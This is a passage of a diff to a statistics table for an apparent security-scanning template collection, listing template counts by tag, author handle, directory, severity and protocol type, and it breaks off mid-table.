| | | | -| misc | 27 | hackergautam | 8 | | | | | | | -| atlassian | 26 | techryptic (@tech) | 7 | | | | | | | -| jira | 25 | randomstr1ng | 7 | | | | | | | -| ssrf | 25 | emadshanab | 7 | | | | | | | -| oob | 24 | dr_set | 7 | | | | | | | -| disclosure | 24 | melbadry9 | 7 | | | | | | | -| logs | 24 | 0x240x23elu | 7 | | | | | | | -| redirect | 20 | that_juan_ | 7 | | | | | | | -| aem | 18 | r3dg33k | 7 | | | | | | | -| listing | 15 | harshbothra_ | 7 | | | | | | | -| cisco | 15 | oppsec | 7 | | | | | | | -| cve2016 | 14 | philippedelteil | 6 | | | | | | | -| sap | 14 | __fazal | 6 | | | | | | | -| misconfig | 13 | yanyun | 5 | | | | | | | -| debug | 13 | pentest_swissky | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | -| struts | 13 | ganofins | 5 | | | | | | | -| fuzz | 12 | caspergn | 5 | | | | | | | -| android | 12 | puzzlepeaches | 5 | | | | | | | -| weblogic | 12 | e_schultze_ | 4 | | | | | | | -| springboot | 11 | meme-lord | 4 | | | | | | | -| auth-bypass | 11 | rootxharsh | 4 | | | | | | | -| zoho | 11 | nodauf | 4 | | | | | | | -| dns | 11 | iamnoooob | 4 | | | | | | | -| devops | 10 | github.com/its0x08 | 4 | | | | | | | -| cve2011 | 10 | xelkomy | 4 | | | | | | | -| cve2012 | 9 | kophjager007 | 3 | | | | | | | -| dlink | 9 | yash anand @yashanand155 | 3 | | | | | | | -| jenkins | 9 | fyoorer | 3 | | | | | | | -| magento | 9 | tess | 3 | | | | | | | -| cnvd | 8 | f1tz | 3 | | | | | | | -| php | 8 | joanbono | 3 | | | | | | | -| ftp | 8 | thomas_from_offensity | 3 | | | | | | | -| gitlab | 8 | z3bd | 3 | | | | | | | -| cve2013 | 8 | impramodsargar | 3 | | | | | | | -| aws | 8 | binaryfigments | 3 | | | | | | | -| airflow | 8 | 0w4ys | 3 | | | | | | | -| adobe | 8 | shine | 3 | | | | | | | -| joomla | 7 | bsysop | 2 | | | | | | | -| cve2014 | 7 | afaq | 2 | | | | | | | -| vmware | 7 | incogbyte | 2 | | | | | | | -| scada | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| backup | 6 | zomsop82 | 2 | | | | | | | -| citrix | 6 | 0xprial | 2 | | | | | | | -| api | 6 | moritz nentwig | 2 | | | | | | | -| rconfig | 6 | amsda | 2 | | | | | | | -| cms | 6 | lu4nx | 2 | | | | | | | -| google | 6 | dheerajmadhukar | 2 | | | | | | | -| rails | 6 | foulenzer | 2 | | | | | | | -| xxe | 6 | davidmckennirey | 2 | | | | | | | -| nginx | 6 | ree4pwn | 2 | | | | | | | -| headless | 5 | hetroublemakr | 2 | | | | | | | -| jetty | 5 | joeldeleep | 2 | | | | | | | -| phpmyadmin | 5 | vavkamil | 2 | | | | | | | -| ruijie | 5 | elsfa7110 | 2 | | | | | | | -| lucee | 5 | mavericknerd | 2 | | | | | | | -| confluence | 5 | kiblyn11 | 2 | | | | | | | -| drupal | 5 | 0xcrypto | 2 | | | | | | | -| java | 5 | ehsahil | 2 | | | | | | | -| ssti | 5 | emenalf | 2 | | | | | | | -| iis | 5 | lotusdll | 2 | | | | | | | -| login | 5 | manas_harsh | 2 | | | | | | | -| circarlife | 5 | 0xrudra | 2 | | | | | | | -| solr | 5 | pxmme1337 | 2 | | | | | | | -| laravel | 5 | udit_thakkur | 2 | | | | | | | -| dell | 5 | swissky | 2 | | | | | | | -| cve2009 | 4 | bp0lr | 2 | | | | | | | -| thinkphp | 4 | jarijaas | 2 | | | | | | | -| nodejs | 4 | 0xelkomy | 2 | | | | | | | -| solarwinds | 4 | unstabl3 | 2 | | | | | | | -| samsung | 4 | gevakun | 2 | | | | | | | -| elastic | 4 | shifacyclewala | 2 | | | | | | | -| fileupload | 4 | 0xsapra | 2 | | | | | | | -| django | 4 | random-robbie | 2 | | | | | | | -| ibm | 4 | randomrobbie | 2 | | | | | | | -| router | 4 | x1m_martijn | 2 | | | | | | | -| jolokia | 4 | _generic_human_ | 1 | | | | | | | -| webserver | 4 | fabaff | 1 | | | | | | | -| netgear | 4 | aceseven (digisec360) | 1 | | | | | | | -| docker | 4 | yashgoti | 1 | | | | | | | -| magmi | 4 | dudez | 1 | | | | | | | -| moodle | 4 | d0rkerdevil | 1 | | | | | | | -| hongdian | 4 | ringo | 1 | | | | | | | -| traversal | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| artifactory | 4 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| vpn | 4 | knassar702 | 1 | | | | | | | -| thinkcmf | 4 | soyelmago | 1 | | | | | | | -| asp | 4 | defr0ggy | 1 | | | | | | | -| tomcat | 4 | ajaysenr | 1 | | | | | | | -| r-seenet | 3 | co0nan | 1 | | | | | | | -| mongodb | 3 | toufik airane | 1 | | | | | | | -| kubernetes | 3 | th3.d1p4k | 1 | | | | | | | -| windows | 3 | alifathi-h1 | 1 | | | | | | | -| slack | 3 | akash.c | 1 | | | | | | | -| nosqli | 3 | divya_mudgal | 1 | | | | | | | -| amazon | 3 | 52971 | 1 | | | | | | | -| bypass | 3 | b4uh0lz | 1 | | | | | | | -| microstrategy | 3 | kurohost | 1 | | | | | | | -| openssh | 3 | sy3omda | 1 | | | | | | | -| vbulletin | 3 | raesene | 1 | | | | | | | -| backups | 3 | _c0wb0y_ | 1 | | | | | | | -| ofbiz | 3 | notsoevilweasel | 1 | | | | | | | -| springcloud | 3 | ooooooo_q | 1 | | | | | | | -| printer | 3 | mubassirpatel | 1 | | | | | | | -| kafka | 3 | mhdsamx | 1 | | | | | | | -| fanruan | 3 | thezakman | 1 | | | | | | | -| deserialization | 3 | smaranchand | 1 | | | | | | | -| fpd | 3 | rtcms | 1 | | | | | | | -| terramaster | 3 | naglinagli | 1 | | | | | | | -| git | 3 | ipanda | 1 | | | | | | | -| dedecms | 3 | koti2 | 1 | | | | | | | -| ebs | 3 | yavolo | 1 | | | | | | | -| grafana | 3 | whynotke | 1 | | | | | | | -| ssh | 3 | mohammedsaneem | 1 | | | | | | | -| caucho | 3 | rodnt | 1 | | | | | | | -| resin | 3 | affix | 1 | | | | | | | -| nacos | 3 | ldionmarcil | 1 | | | | | | | -| lfr | 3 | _harleo | 1 | | | | | | | -| log | 3 | wabafet | 1 | | | | | | | -| crlf | 3 | vsh00t | 1 | | | | | | | -| oa | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| prometheus | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| hjtcloud | 2 | r3naissance | 1 | | | | | | | -| telerik | 2 | streetofhackerr007 | 1 | | | | | | | -| ucmdb | 2 | s1r1u5_ | 1 | | | | | | | -| nextjs | 2 | shifacyclewla | 1 | | | | | | | -| strapi | 2 | yashanand155 | 1 | | | | | | | -| ecology | 2 | taielab | 1 | | | | | | | -| hp | 2 | becivells | 1 | | | | | | | -| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| globalprotect | 2 | shreyapohekar | 1 | | | | | | | -| rstudio | 2 | micha3lb3n | 1 | | | | | | | -| wordfence | 2 | bad5ect0r | 1 | | | | | | | -| yapi | 2 | hanlaomo | 1 | | | | | | | -| bitrix | 2 | fopina | 1 | | | | | | | -| sonicwall | 2 | alperenkesk | 1 | | | | | | | -| openfire | 2 | alph4byt3 | 1 | | | | | | | -| keycloak | 2 | regala_ | 1 | | | | | | | -| couchdb | 2 | andirrahmani1 | 1 | | | | | | | -| sharepoint | 2 | gboddin | 1 | | | | | | | -| intrusive | 2 | its0x08 | 1 | | | | | | | -| plesk | 2 | noamrathaus | 1 | | | | | | | -| mida | 2 | 0h1in9e | 1 | | | | | | | -| activemq | 2 | manuelbua | 1 | | | | | | | -| showdoc | 2 | flag007 | 1 | | | | | | | -| microsoft | 2 | shelld3v | 1 | | | | | | | -| nagios | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| voipmonitor | 2 | qlkwej | 1 | | | | | | | -| frp | 2 | luci | 1 | | | | | | | -| idrac | 2 | deena | 1 | | | | | | | -| saltstack | 2 | bjhulst | 1 | | | | | | | -| sonarqube | 2 | omarkurt | 1 | | | | | | | -| vrealize | 2 | berkdusunur | 1 | | | | | | | -| spark | 2 | tirtha_mandal | 1 | | | | | | | -| smtp | 2 | 0xrod | 1 | | | | | | | -| chamilo | 2 | furkansenan | 1 | | | | | | | -| injection | 2 | pdp | 1 | | | | | | | -| maian | 2 | dogasantos | 1 | | | | | | | -| cache | 2 | luskabol | 1 | | | | | | | -| icewarp | 2 | apt-mirror | 1 | | | | | | | -| service | 2 | iampritam | 1 | | | | | | | -| waf | 2 | ohlinge | 1 | | | | | | | -| natshell | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| paloalto | 2 | rojanrijal | 1 | | | | | | | -| nexus | 2 | ahmed sherif | 1 | | | | | | | -| bigip | 2 | johnjhacking | 1 | | | | | | | -| seeyon | 2 | arcc | 1 | | | | | | | -| webcam | 2 | hakluke | 1 | | | | | | | -| proxy | 2 | thevillagehacker | 1 | | | | | | | -| smb | 2 | kareemse1im | 1 | | | | | | | -| hpe | 2 | abison_binoy | 1 | | | | | | | -| mail | 2 | tim_koopmans | 1 | | | | | | | -| kibana | 2 | sshell | 1 | | | | | | | -| exposures | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| emerge | 2 | jeya seelan | 1 | | | | | | | -| leak | 2 | alex | 1 | | | | | | | -| xxljob | 2 | 0xtavian | 1 | | | | | | | -| openam | 2 | kabirsuda | 1 | | | | | | | -| huawei | 2 | nkxxkn | 1 | | | | | | | -| glassfish | 2 | bolli95 | 1 | | | | | | | -| coldfusion | 2 | schniggie | 1 | | | | | | | -| zhiyuan | 2 | 0ut0fb4nd | 1 | | | | | | | -| fortios | 2 | gal nagli | 1 | | | | | | | -| zabbix | 2 | sicksec | 1 | | | | | | | -| pega | 2 | juicypotato1 | 1 | | | | | | | -| dos | 2 | _darrenmartyn | 1 | | | | | | | -| hashicorp | 2 | fmunozs | 1 | | | | | | | -| httpd | 2 | @github.com/defr0ggy | 1 | | | | | | | -| shellshock | 2 | cookiehanhoan | 1 | | | | | | | -| jboss | 2 | absshax | 1 | | | | | | | -| splunk | 2 | dawid czarnecki | 1 | | | | | | | -| odoo | 2 | idealphase | 1 | | | | | | | -| cve2008 | 2 | sickwell | 1 | | | | | | | -| rockmongo | 2 | zandros0 | 1 | | | | | | | -| jellyfin | 2 | undefl0w | 1 | | | | | | | -| kentico | 2 | daviey | 1 | | | | | | | -| oauth | 2 | exploitation | 1 | | | | | | | -| rockethchat | 2 | j33n1k4 | 1 | | | | | | | -| trixbox | 2 | remonsec | 1 | | | | | | | -| rdp | 1 | nytr0gen | 1 | | | | | | | -| jfrog | 1 | j3ssie/geraldino2 | 1 | | | | | | | -| geutebruck | 1 | akshansh | 1 | | | | | | | -| robomongo | 1 | chron0x | 1 | | | | | | | -| spring | 1 | zhenwarx | 1 | | | | | | | -| proftpd | 1 | willd96 | 1 | | | | | | | -| ueditor | 1 | ratnadip gajbhiye | 1 | | | | | | | -| ec2 | 1 | bing0o | 1 | | | | | | | -| szhe | 1 | elmahdi | 1 | | | | | | | -| nps | 1 | w4cky_ | 1 | | | | | | | -| axis | 1 | pudsec | 1 | | | | | | | -| zzzcms | 1 | c3l3si4n | 1 | | | | | | | -| blue-ocean | 1 | mah3sec_ | 1 | | | | | | | -| viewlinc | 1 | geraldino2 | 1 | | | | | | | -| kubeflow | 1 | kba@sogeti_esec | 1 | | | | | | | -| wooyun | 1 | patralos | 1 | | | | | | | -| tika | 1 | sullo | 1 | | | | | | | -| rmi | 1 | johnk3r | 1 | | | | | | | -| ilo4 | 1 | @dwisiswant0 | 1 | | | | | | | -| springframework | 1 | ilovebinbash | 1 | | | | | | | -| zmanda | 1 | blckraven | 1 | | | | | | | -| yachtcontrol | 1 | vzamanillo | 1 | | | | | | | -| jquery | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| cve2007 | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| linkerd | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| revision | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| targa | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| igs | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| cve2010 | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| +| cve | 462 | dhiyaneshdk | 202 | cves | 468 | info | 453 | http | 1408 | +| panel | 201 | pdteam | 184 | vulnerabilities | 234 | high | 396 | file | 42 | +| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 312 | network | 32 | +| wordpress | 166 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | +| rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | | +| exposure | 154 | daffainfo | 78 | misconfiguration | 114 | | | | | +| cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | | +| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | +| wp-plugin | 111 | gaurang | 42 | file | 42 | | | | | +| cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | | +| config | 81 | ice3man | 26 | miscellaneous | 27 | | | | | +| tech | 72 | pussycat0x | 25 | network | 25 | | | | | +| takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | | +| cve2021 | 70 | organiccrap | 19 | fuzzing | 10 | | | | | +| token | 63 | sheikhrishad | 15 | dns | 10 | | | | | +| cve2018 | 61 | techbrunchfr | 13 | cnvd | 9 | | | | | +| apache | 60 | milo2012 | 13 | headless | 5 | | | | | +| default-login | 45 | pr3r00t | 12 | .pre-commit-config.yaml | 1 | | | | | +| cve2017 | 43 | suman_kar | 12 | | | | | | | +| file | 42 | cyllective | 11 | | | | | | | +| unauth | 39 | random_robbie | 10 | | | | | | | +| network | 32 | righettod | 9 | | | | | | | +| iot | 32 | aashiq | 8 | | | | | | | +| oracle | 29 | wdahlenb | 8 | | | | | | | +| sqli | 29 | iamthefrogy | 8 | | | | | | | +| workflow | 28 | nadino | 8 | | | | | | | +| misc | 27 | hackergautam | 8 | | | | | | | +| atlassian | 26 | 0x240x23elu | 7 | | | | | | | +| jira | 25 | harshbothra_ | 7 | | | | | | | +| ssrf | 25 | r3dg33k | 7 | | | | | | | +| logs | 24 | techryptic (@tech) | 7 | | | | | | | +| disclosure | 24 | that_juan_ | 7 | | | | | | | +| oob | 24 | emadshanab | 7 | | | | | | | +| redirect | 20 | randomstr1ng | 7 | | | | | | | +| aem | 18 | melbadry9 | 7 | | | | | | | +| listing | 15 | dr_set | 7 | | | | | | | +| cisco | 15 | oppsec | 7 | | | | | | | +| sap | 14 | __fazal | 6 | | | | | | | +| cve2016 | 14 | philippedelteil | 6 | | | | | | | +| debug | 13 | ganofins | 5 | | | | | | | +| misconfig | 13 | yanyun | 5 | | | | | | | +| cve2015 | 13 | pentest_swissky | 5 | | | | | | | +| struts | 13 | caspergn | 5 | | | | | | | +| android | 12 | puzzlepeaches | 5 | | | | | | | +| weblogic | 12 | panch0r3d | 5 | | | | | | | +| fuzz | 12 | meme-lord | 4 | | | | | | | +| dns | 11 | github.com/its0x08 | 4 | | | | | | | +| auth-bypass | 11 | e_schultze_ | 4 | | | | | | | +| zoho | 11 | nodauf | 4 | | | | | | | +| springboot | 11 | xelkomy | 4 | | | | | | | +| devops | 10 | iamnoooob | 4 | | | | | | | +| cve2011 | 10 | rootxharsh | 4 | | | | | | | +| cve2012 | 9 | binaryfigments | 3 | | | | | | | +| dlink | 9 | impramodsargar | 3 | | | | | | | +| magento | 9 | z3bd | 3 | | | | | | | +| jenkins | 9 | kophjager007 | 3 | | | | | | | +| airflow | 8 | fyoorer | 3 | | | | | | | +| cnvd | 8 | 0w4ys | 3 | | | | | | | +| ftp | 8 | shine | 3 | | | | | | | +| cve2013 | 8 | f1tz | 3 | | | | | | | +| aws | 8 | yash anand @yashanand155 | 3 | | | | | | | +| gitlab | 8 | tess | 3 | | | | | | | +| adobe | 8 | thomas_from_offensity | 3 | | | | | | | +| php | 8 | joanbono | 3 | | | | | | | +| cve2014 | 7 | 0xprial | 2 | | | | | | | +| joomla | 7 | kiblyn11 | 2 | | | | | | | +| vmware | 7 | zomsop82 | 2 | | | | | | | +| scada | 7 | bsysop | 2 | | | | | | | +| cms | 6 | davidmckennirey | 2 | | | | | | | +| nginx | 6 | 0xcrypto | 2 | | | | | | | +| rails | 6 | pxmme1337 | 2 | | | | | | | +| google | 6 | amsda | 2 | | | | | | | +| api | 6 | manas_harsh | 2 | | | | | | | +| backup | 6 | joeldeleep | 2 | | | | | | | +| citrix | 6 | hetroublemakr | 2 | | | | | | | +| rconfig | 6 | random-robbie | 2 | | | | | | | +| xxe | 6 | lotusdll | 2 | | | | | | | +| drupal | 5 | mavericknerd | 2 | | | | | | | +| solr | 5 | 0xrudra | 2 | | | | | | | +| circarlife | 5 | jarijaas | 2 | | | | | | | +| dell | 5 | 0xsapra | 2 | | | | | | | +| headless | 5 | incogbyte | 2 | | | | | 